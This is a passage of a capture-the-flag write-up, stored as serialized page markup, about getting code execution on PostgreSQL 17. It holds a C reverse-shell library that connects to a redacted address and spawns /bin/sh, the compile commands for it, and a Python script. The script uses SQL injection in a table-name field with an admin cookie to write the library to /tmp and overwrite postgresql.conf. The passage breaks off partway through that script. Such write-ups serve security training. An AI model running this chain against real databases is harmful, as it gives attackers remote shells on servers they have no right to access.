"type":33,"tag":128,"props":9181,"children":9182},{"style":676},[9183],{"type":38,"value":6097},{"type":33,"tag":128,"props":9185,"children":9186},{"class":130,"line":804},[9187,9191,9195,9199,9204],{"type":33,"tag":128,"props":9188,"children":9189},{"style":312},[9190],{"type":38,"value":9092},{"type":33,"tag":128,"props":9192,"children":9193},{"style":1576},[9194],{"type":38,"value":9097},{"type":33,"tag":128,"props":9196,"children":9197},{"style":676},[9198],{"type":38,"value":9102},{"type":33,"tag":128,"props":9200,"children":9201},{"style":140},[9202],{"type":38,"value":9203},"unistd.h",{"type":33,"tag":128,"props":9205,"children":9206},{"style":676},[9207],{"type":38,"value":6097},{"type":33,"tag":128,"props":9209,"children":9210},{"class":130,"line":839},[9211,9215,9219,9223,9228],{"type":33,"tag":128,"props":9212,"children":9213},{"style":312},[9214],{"type":38,"value":9092},{"type":33,"tag":128,"props":9216,"children":9217},{"style":1576},[9218],{"type":38,"value":9097},{"type":33,"tag":128,"props":9220,"children":9221},{"style":676},[9222],{"type":38,"value":9102},{"type":33,"tag":128,"props":9224,"children":9225},{"style":140},[9226],{"type":38,"value":9227},"netinet/in.h",{"type":33,"tag":128,"props":9229,"children":9230},{"style":676},[9231],{"type":38,"value":6097},{"type":33,"tag":128,"props":9233,"children":9234},{"class":130,"line":848},[9235,9239,9243,9247,9252],{"type":33,"tag":128,"props":9236,"children":9237},{"style":312},[9238],{"type":38,"value":9092},{"type":33,"tag":128,"props":9240,"children":9241},{"style":1576},[9242],{"type":38,"value":9097},{"type":33,"tag":128,"props":9244,"children":9245},{"style":676},[9246],{"type":38,"value":9102},{"type":33,"tag":128,"props":9248,"children":9249},{"style":140},[9250],{"type":38,"value":9251},"arpa/inet.h",{"type":33,"tag":128,"props":9253,"children":9254},{"style":676},[9255],{"type":38,"value":6097},{"type":33,"tag":128,"props":9257,"children":9258},{"class":130,"line":976},[9259,9263,9267,9271,9276],{"type":33,"tag":128,"props":9260,"children":9261},{"style":312},[9262],{"type":38,"value":9092},{"type":33,"tag":128,"props":9264,"children":9265},{"style":1576},[9266],{"type":38,"value":9097},{"type":33,"tag":128,"props":9268,"children":9269},{"style":676},[9270],{"type":38,"value":679},{"type":33,"tag":128,"props":9272,"children":9273},{"style":140},[9274],{"type":38,"value":9275},"postgres.h",{"type":33,"tag":128,"props":9277,"children":9278},{"style":676},[9279],{"type":38,"value":836},{"type":33,"tag":128,"props":9281,"children":9282},{"class":130,"line":988},[9283,9287,9291,9295,9300],{"type":33,"tag":128,"props":9284,"children":9285},{"style":312},[9286],{"type":38,"value":9092},{"type":33,"tag":128,"props":9288,"children":9289},{"style":1576},[9290],{"type":38,"value":9097},{"type":33,"tag":128,"props":9292,"children":9293},{"style":676},[9294],{"type":38,"value":679},{"type":33,"tag":128,"props":9296,"children":9297},{"style":140},[9298],{"type":38,"value":9299},"fmgr.h",{"type":33,"tag":128,"props":9301,"children":9302},{"style":676},[9303],{"type":38,"value":836},{"type":33,"tag":128,"props":9305,"children":9306},{"class":130,"line":1001},[9307],{"type":33,"tag":128,"props":9308,"children":9309},{"emptyLinePlaceholder":896},[9310],{"type":38,"value":899},{"type":33,"tag":128,"props":9312,"children":9313},{"class":130,"line":1014},[9314,9318,9323],{"type":33,"tag":128,"props":9315,"children":9316},{"style":312},[9317],{"type":38,"value":9092},{"type":33,"tag":128,"props":9319,"children":9320},{"style":1576},[9321],{"type":38,"value":9322},"ifdef",{"type":33,"tag":128,"props":9324,"children":9325},{"style":135},[9326],{"type":38,"value":9327}," PG_MODULE_MAGIC\n",{"type":33,"tag":128,"props":9329,"children":9330},{"class":130,"line":1026},[9331,9336],{"type":33,"tag":128,"props":9332,"children":9333},{"style":323},[9334],{"type":38,"value":9335},"PG_MODULE_MAGIC",{"type":33,"tag":128,"props":9337,"children":9338},{"style":312},[9339],{"type":38,"value":5676},{"type":33,"tag":128,"props":9341,"children":9342},{"class":130,"line":1038},[9343,9347],{"type":33,"tag":128,"props":9344,"children":9345},{"style":312},[9346],{"type":38,"value":9092},{"type":33,"tag":128,"props":9348,"children":9349},{"style":1576},[9350],{"type":38,"value":9351},"endif\n",{"type":33,"tag":128,"props":9353,"children":9354},{"class":130,"line":1051},[9355],{"type":33,"tag":128,"props":9356,"children":9357},{"emptyLinePlaceholder":896},[9358],{"type":38,"value":899},{"type":33,"tag":128,"props":9360,"children":9361},{"class":130,"line":1063},[9362,9367,9372,9377],{"type":33,"tag":128,"props":9363,"children":9364},{"style":300},[9365],{"type":38,"value":9366},"void",{"type":33,"tag":128,"props":9368,"children":9369},{"style":135},[9370],{"type":38,"value":9371}," _init",{"type":33,"tag":128,"props":9373,"children":9374},{"style":312},[9375],{"type":38,"value":9376},"()",{"type":33,"tag":128,"props":9378,"children":9379},{"style":312},[9380],{"type":38,"value":762},{"type":33,"tag":128,"props":9382,"children":9383},{"class":130,"line":1076},[9384],{"type":33,"tag":128,"props":9385,"children":9386},{"style":5541},[9387],{"type":38,"value":9388}," /*\n",{"type":33,"tag":128,"props":9390,"children":9391},{"class":130,"line":1089},[9392],{"type":33,"tag":128,"props":9393,"children":9394},{"style":5541},[9395],{"type":38,"value":9396}," code taken from https://www.revshells.com/\n",{"type":33,"tag":128,"props":9398,"children":9399},{"class":130,"line":1101},[9400],{"type":33,"tag":128,"props":9401,"children":9402},{"style":5541},[9403],{"type":38,"value":9404}," */\n",{"type":33,"tag":128,"props":9406,"children":9407},{"class":130,"line":1114},[9408],{"type":33,"tag":128,"props":9409,"children":9410},{"emptyLinePlaceholder":896},[9411],{"type":38,"value":899},{"type":33,"tag":128,"props":9413,"children":9414},{"class":130,"line":1127},[9415,9420,9425,9429,9434],{"type":33,"tag":128,"props":9416,"children":9417},{"style":300},[9418],{"type":38,"value":9419}," int",{"type":33,"tag":128,"props":9421,"children":9422},{"style":323},[9423],{"type":38,"value":9424}," port ",{"type":33,"tag":128,"props":9426,"children":9427},{"style":312},[9428],{"type":38,"value":315},{"type":33,"tag":128,"props":9430,"children":9431},{"style":523},[9432],{"type":38,"value":9433}," 9999",{"type":33,"tag":128,"props":9435,"children":9436},{"style":312},[9437],{"type":38,"value":5676},{"type":33,"tag":128,"props":9439,"children":9440},{"class":130,"line":1139},[9441,9446,9451],{"type":33,"tag":128,"props":9442,"children":9443},{"style":300},[9444],{"type":38,"value":9445}," struct",{"type":33,"tag":128,"props":9447,"children":9448},{"style":323},[9449],{"type":38,"value":9450}," sockaddr_in revsockaddr",{"type":33,"tag":128,"props":9452,"children":9453},{"style":312},[9454],{"type":38,"value":5676},{"type":33,"tag":128,"props":9456,"children":9457},{"class":130,"line":1152},[9458],{"type":33,"tag":128,"props":9459,"children":9460},{"emptyLinePlaceholder":896},[9461],{"type":38,"value":899},{"type":33,"tag":128,"props":9463,"children":9464},{"class":130,"line":1165},[9465,9469,9474,9478,9483,9487,9492,9496,9501,9505,9510],{"type":33,"tag":128,"props":9466,"children":9467},{"style":300},[9468],{"type":38,"value":9419},{"type":33,"tag":128,"props":9470,"children":9471},{"style":323},[9472],{"type":38,"value":9473}," sockt ",{"type":33,"tag":128,"props":9475,"children":9476},{"style":312},[9477],{"type":38,"value":315},{"type":33,"tag":128,"props":9479,"children":9480},{"style":135},[9481],{"type":38,"value":9482}," socket",{"type":33,"tag":128,"props":9484,"children":9485},{"style":312},[9486],{"type":38,"value":5566},{"type":33,"tag":128,"props":9488,"children":9489},{"style":323},[9490],{"type":38,"value":9491},"AF_INET",{"type":33,"tag":128,"props":9493,"children":9494},{"style":312},[9495],{"type":38,"value":5584},{"type":33,"tag":128,"props":9497,"children":9498},{"style":323},[9499],{"type":38,"value":9500}," SOCK_STREAM",{"type":33,"tag":128,"props":9502,"children":9503},{"style":312},[9504],{"type":38,"value":5584},{"type":33,"tag":128,"props":9506,"children":9507},{"style":523},[9508],{"type":38,"value":9509}," 0",{"type":33,"tag":128,"props":9511,"children":9512},{"style":312},[9513],{"type":38,"value":5815},{"type":33,"tag":128,"props":9515,"children":9516},{"class":130,"line":1177},[9517,9522,9526,9531,9535,9540],{"type":33,"tag":128,"props":9518,"children":9519},{"style":306},[9520],{"type":38,"value":9521}," revsockaddr",{"type":33,"tag":128,"props":9523,"children":9524},{"style":312},[9525],{"type":38,"value":215},{"type":33,"tag":128,"props":9527,"children":9528},{"style":306},[9529],{"type":38,"value":9530},"sin_family",{"type":33,"tag":128,"props":9532,"children":9533},{"style":312},[9534],{"type":38,"value":5657},{"type":33,"tag":128,"props":9536,"children":9537},{"style":323},[9538],{"type":38,"value":9539}," AF_INET",{"type":33,"tag":128,"props":9541,"children":9542},{"style":312},[9543],{"type":38,"value":5676},{"type":33,"tag":128,"props":9545,"children":9546},{"class":130,"line":1189},[9547,9551,9555,9560,9564,9569,9573,9578],{"type":33,"tag":128,"props":9548,"children":9549},{"style":306},[9550],{"type":38,"value":9521},{"type":33,"tag":128,"props":9552,"children":9553},{"style":312},[9554],{"type":38,"value":215},{"type":33,"tag":128,"props":9556,"children":9557},{"style":306},[9558],{"type":38,"value":9559},"sin_port",{"type":33,"tag":128,"props":9561,"children":9562},{"style":312},[9563],{"type":38,"value":5657},{"type":33,"tag":128,"props":9565,"children":9566},{"style":135},[9567],{"type":38,"value":9568}," htons",{"type":33,"tag":128,"props":9570,"children":9571},{"style":312},[9572],{"type":38,"value":5566},{"type":33,"tag":128,"props":9574,"children":9575},{"style":323},[9576],{"type":38,"value":9577},"port",{"type":33,"tag":128,"props":9579,"children":9580},{"style":312},[9581],{"type":38,"value":5815},{"type":33,"tag":128,"props":9583,"children":9584},{"class":130,"line":1202},[9585,9589,9593,9598,9602,9607,9611,9616,9620,9624,9629,9633],{"type":33,"tag":128,"props":9586,"children":9587},{"style":306},[9588],{"type":38,"value":9521},{"type":33,"tag":128,"props":9590,"children":9591},{"style":312},[9592],{"type":38,"value":215},{"type":33,"tag":128,"props":9594,"children":9595},{"style":306},[9596],{"type":38,"value":9597},"sin_addr",{"type":33,"tag":128,"props":9599,"children":9600},{"style":312},[9601],{"type":38,"value":215},{"type":33,"tag":128,"props":9603,"children":9604},{"style":306},[9605],{"type":38,"value":9606},"s_addr",{"type":33,"tag":128,"props":9608,"children":9609},{"style":312},[9610],{"type":38,"value":5657},{"type":33,"tag":128,"props":9612,"children":9613},{"style":135},[9614],{"type":38,"value":9615}," inet_addr",{"type":33,"tag":128,"props":9617,"children":9618},{"style":312},[9619],{"type":38,"value":5566},{"type":33,"tag":128,"props":9621,"children":9622},{"style":676},[9623],{"type":38,"value":669},{"type":33,"tag":128,"props":9625,"children":9626},{"style":140},[9627],{"type":38,"value":9628},"[REDACTED]",{"type":33,"tag":128,"props":9630,"children":9631},{"style":676},[9632],{"type":38,"value":669},{"type":33,"tag":128,"props":9634,"children":9635},{"style":312},[9636],{"type":38,"value":5815},{"type":33,"tag":128,"props":9638,"children":9639},{"class":130,"line":1214},[9640],{"type":33,"tag":128,"props":9641,"children":9642},{"emptyLinePlaceholder":896},[9643],{"type":38,"value":899},{"type":33,"tag":128,"props":9645,"children":9646},{"class":130,"line":1226},[9647,9652,9656,9661,9665,9669,9674,9679,9684,9688,9693,9698],{"type":33,"tag":128,"props":9648,"children":9649},{"style":135},[9650],{"type":38,"value":9651}," connect",{"type":33,"tag":128,"props":9653,"children":9654},{"style":312},[9655],{"type":38,"value":5566},{"type":33,"tag":128,"props":9657,"children":9658},{"style":323},[9659],{"type":38,"value":9660},"sockt",{"type":33,"tag":128,"props":9662,"children":9663},{"style":312},[9664],{"type":38,"value":5584},{"type":33,"tag":128,"props":9666,"children":9667},{"style":312},[9668],{"type":38,"value":2852},{"type":33,"tag":128,"props":9670,"children":9671},{"style":300},[9672],{"type":38,"value":9673},"struct",{"type":33,"tag":128,"props":9675,"children":9676},{"style":323},[9677],{"type":38,"value":9678}," sockaddr ",{"type":33,"tag":128,"props":9680,"children":9681},{"style":300},[9682],{"type":38,"value":9683},"*",{"type":33,"tag":128,"props":9685,"children":9686},{"style":312},[9687],{"type":38,"value":2966},{"type":33,"tag":128,"props":9689,"children":9690},{"style":300},[9691],{"type":38,"value":9692}," &",{"type":33,"tag":128,"props":9694,"children":9695},{"style":323},[9696],{"type":38,"value":9697},"revsockaddr",{"type":33,"tag":128,"props":9699,"children":9700},{"style":312},[9701],{"type":38,"value":693},{"type":33,"tag":128,"props":9703,"children":9704},{"class":130,"line":1239},[9705,9710,9714,9718],{"type":33,"tag":128,"props":9706,"children":9707},{"style":300},[9708],{"type":38,"value":9709}," sizeof",{"type":33,"tag":128,"props":9711,"children":9712},{"style":312},[9713],{"type":38,"value":5566},{"type":33,"tag":128,"props":9715,"children":9716},{"style":323},[9717],{"type":38,"value":9697},{"type":33,"tag":128,"props":9719,"children":9720},{"style":312},[9721],{"type":38,"value":9722},"));\n",{"type":33,"tag":128,"props":9724,"children":9725},{"class":130,"line":1251},[9726,9731,9735,9739,9743,9747],{"type":33,"tag":128,"props":9727,"children":9728},{"style":135},[9729],{"type":38,"value":9730}," dup2",{"type":33,"tag":128,"props":9732,"children":9733},{"style":312},[9734],{"type":38,"value":5566},{"type":33,"tag":128,"props":9736,"children":9737},{"style":323},[9738],{"type":38,"value":9660},{"type":33,"tag":128,"props":9740,"children":9741},{"style":312},[9742],{"type":38,"value":5584},{"type":33,"tag":128,"props":9744,"children":9745},{"style":523},[9746],{"type":38,"value":9509},{"type":33,"tag":128,"props":9748,"children":9749},{"style":312},[9750],{"type":38,"value":5815},{"type":33,"tag":128,"props":9752,"children":9753},{"class":130,"line":1263},[9754,9758,9762,9766,9770,9775],{"type":33,"tag":128,"props":9755,"children":9756},{"style":135},[9757],{"type":38,"value":9730},{"type":33,"tag":128,"props":9759,"children":9760},{"style":312},[9761],{"type":38,"value":5566},{"type":33,"tag":128,"props":9763,"children":9764},{"style":323},[9765],{"type":38,"value":9660},{"type":33,"tag":128,"props":9767,"children":9768},{"style":312},[9769],{"type":38,"value":5584},{"type":33,"tag":128,"props":9771,"children":9772},{"style":523},[9773],{"type":38,"value":9774}," 1",{"type":33,"tag":128,"props":9776,"children":9777},{"style":312},[9778],{"type":38,"value":5815},{"type":33,"tag":128,"props":9780,"children":9781},{"class":130,"line":1276},[9782,9786,9790,9794,9798,9803],{"type":33,"tag":128,"props":9783,"children":9784},{"style":135},[9785],{"type":38,"value":9730},{"type":33,"tag":128,"props":9787,"children":9788},{"style":312},[9789],{"type":38,"value":5566},{"type":33,"tag":128,"props":9791,"children":9792},{"style":323},[9793],{"type":38,"value":9660},{"type":33,"tag":128,"props":9795,"children":9796},{"style":312},[9797],{"type":38,"value":5584},{"type":33,"tag":128,"props":9799,"children":9800},{"style":523},[9801],{"type":38,"value":9802}," 2",{"type":33,"tag":128,"props":9804,"children":9805},{"style":312},[9806],{"type":38,"value":5815},{"type":33,"tag":128,"props":9808,"children":9809},{"class":130,"line":1288},[9810],{"type":33,"tag":128,"props":9811,"children":9812},{"emptyLinePlaceholder":896},[9813],{"type":38,"value":899},{"type":33,"tag":128,"props":9815,"children":9816},{"class":130,"line":1300},[9817,9822,9827,9832,9837,9842,9846,9850,9854,9859,9863,9867,9872],{"type":33,"tag":128,"props":9818,"children":9819},{"style":300},[9820],{"type":38,"value":9821}," char",{"type":33,"tag":128,"props":9823,"children":9824},{"style":300},[9825],{"type":38,"value":9826}," *",{"type":33,"tag":128,"props":9828,"children":9829},{"style":300},[9830],{"type":38,"value":9831}," const",{"type":33,"tag":128,"props":9833,"children":9834},{"style":323},[9835],{"type":38,"value":9836}," argv",{"type":33,"tag":128,"props":9838,"children":9839},{"style":300},[9840],{"type":38,"value":9841},"[]",{"type":33,"tag":128,"props":9843,"children":9844},{"style":312},[9845],{"type":38,"value":5657},{"type":33,"tag":128,"props":9847,"children":9848},{"style":312},[9849],{"type":38,"value":5642},{"type":33,"tag":128,"props":9851,"children":9852},{"style":676},[9853],{"type":38,"value":669},{"type":33,"tag":128,"props":9855,"children":9856},{"style":140},[9857],{"type":38,"value":9858},"/bin/sh",{"type":33,"tag":128,"props":9860,"children":9861},{"style":676},[9862],{"type":38,"value":669},{"type":33,"tag":128,"props":9864,"children":9865},{"style":312},[9866],{"type":38,"value":5584},{"type":33,"tag":128,"props":9868,"children":9869},{"style":1576},[9870],{"type":38,"value":9871}," NULL",{"type":33,"tag":128,"props":9873,"children":9874},{"style":312},[9875],{"type":38,"value":9876},"};\n",{"type":33,"tag":128,"props":9878,"children":9879},{"class":130,"line":1313},[9880,9885,9889,9893,9897,9901,9905,9909,9913,9917],{"type":33,"tag":128,"props":9881,"children":9882},{"style":135},[9883],{"type":38,"value":9884}," execve",{"type":33,"tag":128,"props":9886,"children":9887},{"style":312},[9888],{"type":38,"value":5566},{"type":33,"tag":128,"props":9890,"children":9891},{"style":676},[9892],{"type":38,"value":669},{"type":33,"tag":128,"props":9894,"children":9895},{"style":140},[9896],{"type":38,"value":9858},{"type":33,"tag":128,"props":9898,"children":9899},{"style":676},[9900],{"type":38,"value":669},{"type":33,"tag":128,"props":9902,"children":9903},{"style":312},[9904],{"type":38,"value":5584},{"type":33,"tag":128,"props":9906,"children":9907},{"style":323},[9908],{"type":38,"value":9836},{"type":33,"tag":128,"props":9910,"children":9911},{"style":312},[9912],{"type":38,"value":5584},{"type":33,"tag":128,"props":9914,"children":9915},{"style":1576},[9916],{"type":38,"value":9871},{"type":33,"tag":128,"props":9918,"children":9919},{"style":312},[9920],{"type":38,"value":5815},{"type":33,"tag":128,"props":9922,"children":9923},{"class":130,"line":1327},[9924],{"type":33,"tag":128,"props":9925,"children":9926},{"style":312},[9927],{"type":38,"value":854},{"type":33,"tag":47,"props":9929,"children":9930},{},[9931,9933,9939],{"type":38,"value":9932},"To compile our library, it's best to be in an environment identical to the challenge, following the same PostgreSQL version, which is the latest (version 17). I used Docker to have a clean environment, it's important to install ",{"type":33,"tag":105,"props":9934,"children":9936},{"className":9935},[],[9937],{"type":38,"value":9938},"postgresql-server-dev-17",{"type":38,"value":9940}," which will provide the postgres.h library that is essential for compiling our library.",{"type":33,"tag":114,"props":9942,"children":9943},{"lang":116},[9944],{"type":33,"tag":119,"props":9945,"children":9947},{"className":121,"code":9946,"language":116,"meta":8,"style":8},"$> docker pull postgres\n$> docker run -it 76e3e031d245 /bin/bash\n$> apt update && apt install -y posgresql-server-dev-17 gcc vim\n$> gcc \\\n-I$(pg_config --includedir-server) \\\n-shared \\\n-fPIC \\\n-nostartfiles \\\n-o payload.so \\\npayload.c\n$> cat payload.so | base64 -w > payload.b64\n",[9948],{"type":33,"tag":105,"props":9949,"children":9950},{"__ignoreMap":8},[9951,9977,10012,10068,10088,10111,10123,10135,10147,10163,10171],{"type":33,"tag":128,"props":9952,"children":9953},{"class":130,"line":131},[9954,9958,9962,9967,9972],{"type":33,"tag":128,"props":9955,"children":9956},{"style":135},[9957],{"type":38,"value":3651},{"type":33,"tag":128,"props":9959,"children":9960},{"style":323},[9961],{"type":38,"value":3656},{"type":33,"tag":128,"props":9963,"children":9964},{"style":140},[9965],{"type":38,"value":9966},"docker",{"type":33,"tag":128,"props":9968,"children":9969},{"style":140},[9970],{"type":38,"value":9971}," pull",{"type":33,"tag":128,"props":9973,"children":9974},{"style":140},[9975],{"type":38,"value":9976}," postgres\n",{"type":33,"tag":128,"props":9978,"children":9979},{"class":130,"line":362},[9980,9984,9988,9992,9997,10002,10007],{"type":33,"tag":128,"props":9981,"children":9982},{"style":135},[9983],{"type":38,"value":3651},{"type":33,"tag":128,"props":9985,"children":9986},{"style":323},[9987],{"type":38,"value":3656},{"type":33,"tag":128,"props":9989,"children":9990},{"style":140},[9991],{"type":38,"value":9966},{"type":33,"tag":128,"props":9993,"children":9994},{"style":140},[9995],{"type":38,"value":9996}," run",{"type":33,"tag":128,"props":9998,"children":9999},{"style":151},[10000],{"type":38,"value":10001}," -it",{"type":33,"tag":128,"props":10003,"children":10004},{"style":140},[10005],{"type":38,"value":10006}," 76e3e031d245",{"type":33,"tag":128,"props":10008,"children":10009},{"style":140},[10010],{"type":38,"value":10011}," /bin/bash\n",{"type":33,"tag":128,"props":10013,"children":10014},{"class":130,"line":403},[10015,10019,10023,10028,10033,10038,10043,10048,10053,10058,10063],{"type":33,"tag":128,"props":10016,"children":10017},{"style":135},[10018],{"type":38,"value":3651},{"type":33,"tag":128,"props":10020,"children":10021},{"style":323},[10022],{"type":38,"value":3656},{"type":33,"tag":128,"props":10024,"children":10025},{"style":140},[10026],{"type":38,"value":10027},"apt",{"type":33,"tag":128,"props":10029,"children":10030},{"style":140},[10031],{"type":38,"value":10032}," update",{"type":33,"tag":128,"props":10034,"children":10035},{"style":312},[10036],{"type":38,"value":10037}," &&",{"type":33,"tag":128,"props":10039,"children":10040},{"style":135},[10041],{"type":38,"value":10042}," apt",{"type":33,"tag":128,"props":10044,"children":10045},{"style":140},[10046],{"type":38,"value":10047}," install",{"type":33,"tag":128,"props":10049,"children":10050},{"style":151},[10051],{"type":38,"value":10052}," -y",{"type":33,"tag":128,"props":10054,"children":10055},{"style":140},[10056],{"type":38,"value":10057}," posgresql-server-dev-17",{"type":33,"tag":128,"props":10059,"children":10060},{"style":140},[10061],{"type":38,"value":10062}," gcc",{"type":33,"tag":128,"props":10064,"children":10065},{"style":140},[10066],{"type":38,"value":10067}," vim\n",{"type":33,"tag":128,"props":10069,"children":10070},{"class":130,"line":739},[10071,10075,10079,10084],{"type":33,"tag":128,"props":10072,"children":10073},{"style":135},[10074],{"type":38,"value":3651},{"type":33,"tag":128,"props":10076,"children":10077},{"style":323},[10078],{"type":38,"value":3656},{"type":33,"tag":128,"props":10080,"children":10081},{"style":140},[10082],{"type":38,"value":10083},"gcc",{"type":33,"tag":128,"props":10085,"children":10086},{"style":151},[10087],{"type":38,"value":2720},{"type":33,"tag":128,"props":10089,"children":10090},{"class":130,"line":765},[10091,10096,10101,10106],{"type":33,"tag":128,"props":10092,"children":10093},{"style":323},[10094],{"type":38,"value":10095},"-I$(pg_config ",{"type":33,"tag":128,"props":10097,"children":10098},{"style":151},[10099],{"type":38,"value":10100},"--includedir-server",{"type":33,"tag":128,"props":10102,"children":10103},{"style":323},[10104],{"type":38,"value":10105},") ",{"type":33,"tag":128,"props":10107,"children":10108},{"style":151},[10109],{"type":38,"value":10110},"\\\n",{"type":33,"tag":128,"props":10112,"children":10113},{"class":130,"line":804},[10114,10119],{"type":33,"tag":128,"props":10115,"children":10116},{"style":135},[10117],{"type":38,"value":10118},"-shared",{"type":33,"tag":128,"props":10120,"children":10121},{"style":151},[10122],{"type":38,"value":2720},{"type":33,"tag":128,"props":10124,"children":10125},{"class":130,"line":839},[10126,10131],{"type":33,"tag":128,"props":10127,"children":10128},{"style":323},[10129],{"type":38,"value":10130},"-fPIC ",{"type":33,"tag":128,"props":10132,"children":10133},{"style":151},[10134],{"type":38,"value":10110},{"type":33,"tag":128,"props":10136,"children":10137},{"class":130,"line":848},[10138,10143],{"type":33,"tag":128,"props":10139,"children":10140},{"style":323},[10141],{"type":38,"value":10142},"-nostartfiles ",{"type":33,"tag":128,"props":10144,"children":10145},{"style":151},[10146],{"type":38,"value":10110},{"type":33,"tag":128,"props":10148,"children":10149},{"class":130,"line":976},[10150,10155,10159],{"type":33,"tag":128,"props":10151,"children":10152},{"style":323},[10153],{"type":38,"value":10154},"-o ",{"type":33,"tag":128,"props":10156,"children":10157},{"style":140},[10158],{"type":38,"value":9042},{"type":33,"tag":128,"props":10160,"children":10161},{"style":151},[10162],{"type":38,"value":2720},{"type":33,"tag":128,"props":10164,"children":10165},{"class":130,"line":988},[10166],{"type":33,"tag":128,"props":10167,"children":10168},{"style":323},[10169],{"type":38,"value":10170},"payload.c\n",{"type":33,"tag":128,"props":10172,"children":10173},{"class":130,"line":1001},[10174,10178,10182,10186,10191,10196,10201,10206,10210],{"type":33,"tag":128,"props":10175,"children":10176},{"style":135},[10177],{"type":38,"value":3651},{"type":33,"tag":128,"props":10179,"children":10180},{"style":323},[10181],{"type":38,"value":3656},{"type":33,"tag":128,"props":10183,"children":10184},{"style":140},[10185],{"type":38,"value":2467},{"type":33,"tag":128,"props":10187,"children":10188},{"style":140},[10189],{"type":38,"value":10190}," payload.so",{"type":33,"tag":128,"props":10192,"children":10193},{"style":300},[10194],{"type":38,"value":10195}," |",{"type":33,"tag":128,"props":10197,"children":10198},{"style":135},[10199],{"type":38,"value":10200}," base64",{"type":33,"tag":128,"props":10202,"children":10203},{"style":151},[10204],{"type":38,"value":10205}," -w",{"type":33,"tag":128,"props":10207,"children":10208},{"style":300},[10209],{"type":38,"value":2472},{"type":33,"tag":128,"props":10211,"children":10212},{"style":140},[10213],{"type":38,"value":10214}," payload.b64\n",{"type":33,"tag":47,"props":10216,"children":10217},{},[10218],{"type":38,"value":10219},"Once our payload is compiled, we will encode it in base64.",{"type":33,"tag":47,"props":10221,"children":10222},{},[10223],{"type":38,"value":10224},"We will use a Python script that will automate the writing of files to the filesystem, the script will write the library to /tmp and overwrite the new library. Once everything is written, the configuration needs to be reloaded, for reasons unknown it is essential to reload the configuration multiple times to have an effect.",{"type":33,"tag":114,"props":10226,"children":10228},{"lang":10227},"python",[10229],{"type":33,"tag":119,"props":10230,"children":10233},{"className":10231,"code":10232,"language":10227,"meta":8,"style":8},"language-python shiki shiki-themes vitesse-dark","import requests\nimport base64\nimport random\n\n\nSESSION_COOKIE = 'connect.sid=\u003CADMIN_COOKIE>'\nBASE_URL = 'http://\u003CCHALLENGE_IP:PORT>/table'\nheaders = {\n 'Cookie': SESSION_COOKIE\n}\n\ndef get_randnum():\n return random.randint(0, 31337*5)\n\ndef exec_payload(sql):\n body = {\"tableName\": f\"users\\\" where 1=({sql})--\"}\n res = requests.post(BASE_URL, headers=headers, json=body)\n print(res.status_code)\n \n\ndef file_to_base64(file_path):\n with open(file_path, \"rb\") as file:\n base64_encoded = base64.b64encode(file.read()).decode(\"utf-8\")\n return base64_encoded\n\ndef read_base64file(file_path):\n with open(file_path, \"r\") as file:\n base64_content = file.read()\n return base64_content\n\nif __name__ == \"__main__\":\n # upload b64 so\n payload = read_base64file(\"payload.b64\")\n current_id = get_randnum()\n \n exec_payload(f\"SELECT lo_from_bytea({current_id}, decode('{payload}', 'base64'))\")\n exec_payload(f\"SELECT lo_export({current_id}, '/tmp/payload.so')\")\n\n # upload conf\n conf = file_to_base64(\"conf\")\n current_id = get_randnum()\n \n exec_payload(f\"SELECT lo_from_bytea({current_id}, decode('{conf}', 'base64'))\")\n exec_payload(f\"SELECT lo_export({current_id}, '/var/lib/postgresql/data/postgresql.conf')\")\n\n # reload conf\n exec_payload(f\"SELECT pg_reload_conf()\")\n exec_payload(f\"SELECT pg_reload_conf()\")\n exec_payload(f\"SELECT pg_reload_conf()\")\n\n",[10234],{"type":33,"tag":105,"props":10235,"children":10236},{"__ignoreMap":8},[10237,10250,10262,10274,10281,10288,10314,10339,10355,10381,10388,10395,10413,10465,10472,10498,10571,10643,10673,10681,10688,10713,10768,10842,10854,10861,10885,10937,10965,10977,10984,11019,11027,11064,11084,11091,11153,11194,11202,11211,11248,11268,11276,11332,11373,11381,11390,11415,11439],{"type":33,"tag":128,"props":10238,"children":10239},{"class":130,"line":131},[10240,10245],{"type":33,"tag":128,"props":10241,"children":10242},{"style":1576},[10243],{"type":38,"value":10244},"import",{"type":33,"tag":128,"props":10246,"children":10247},{"style":323},[10248],{"type":38,"value":10249}," requests\n",{"type":33,"tag":128,"props":10251,"children":10252},{"class":130,"line":362},[10253,10257],{"type":33,"tag":128,"props":10254,"children":10255},{"style":1576},[10256],{"type":38,"value":10244},{"type":33,"tag":128,"props":10258,"children":10259},{"style":323},[10260],{"type":38,"value":10261}," base64\n",{"type":33,"tag":128,"props":10263,"children":10264},{"class":130,"line":403},[10265,10269],{"type":33,"tag":128,"props":10266,"children":10267},{"style":1576},[10268],{"type":38,"value":10244},{"type":33,"tag":128,"props":10270,"children":10271},{"style":323},[10272],{"type":38,"value":10273}," random\n",{"type":33,"tag":128,"props":10275,"children":10276},{"class":130,"line":739},[10277],{"type":33,"tag":128,"props":10278,"children":10279},{"emptyLinePlaceholder":896},[10280],{"type":38,"value":899},{"type":33,"tag":128,"props":10282,"children":10283},{"class":130,"line":765},[10284],{"type":33,"tag":128,"props":10285,"children":10286},{"emptyLinePlaceholder":896},[10287],{"type":38,"value":899},{"type":33,"tag":128,"props":10289,"children":10290},{"class":130,"line":804},[10291,10296,10300,10304,10309],{"type":33,"tag":128,"props":10292,"children":10293},{"style":151},[10294],{"type":38,"value":10295},"SESSION_COOKIE",{"type":33,"tag":128,"props":10297,"children":10298},{"style":312},[10299],{"type":38,"value":5657},{"type":33,"tag":128,"props":10301,"children":10302},{"style":676},[10303],{"type":38,"value":6739},{"type":33,"tag":128,"props":10305,"children":10306},{"style":140},[10307],{"type":38,"value":10308},"connect.sid=\u003CADMIN_COOKIE>",{"type":33,"tag":128,"props":10310,"children":10311},{"style":676},[10312],{"type":38,"value":10313},"'\n",{"type":33,"tag":128,"props":10315,"children":10316},{"class":130,"line":839},[10317,10322,10326,10330,10335],{"type":33,"tag":128,"props":10318,"children":10319},{"style":151},[10320],{"type":38,"value":10321},"BASE_URL",{"type":33,"tag":128,"props":10323,"children":10324},{"style":312},[10325],{"type":38,"value":5657},{"type":33,"tag":128,"props":10327,"children":10328},{"style":676},[10329],{"type":38,"value":6739},{"type":33,"tag":128,"props":10331,"children":10332},{"style":140},[10333],{"type":38,"value":10334},"http://\u003CCHALLENGE_IP:PORT>/table",{"type":33,"tag":128,"props":10336,"children":10337},{"style":676},[10338],{"type":38,"value":10313},{"type":33,"tag":128,"props":10340,"children":10341},{"class":130,"line":848},[10342,10347,10351],{"type":33,"tag":128,"props":10343,"children":10344},{"style":323},[10345],{"type":38,"value"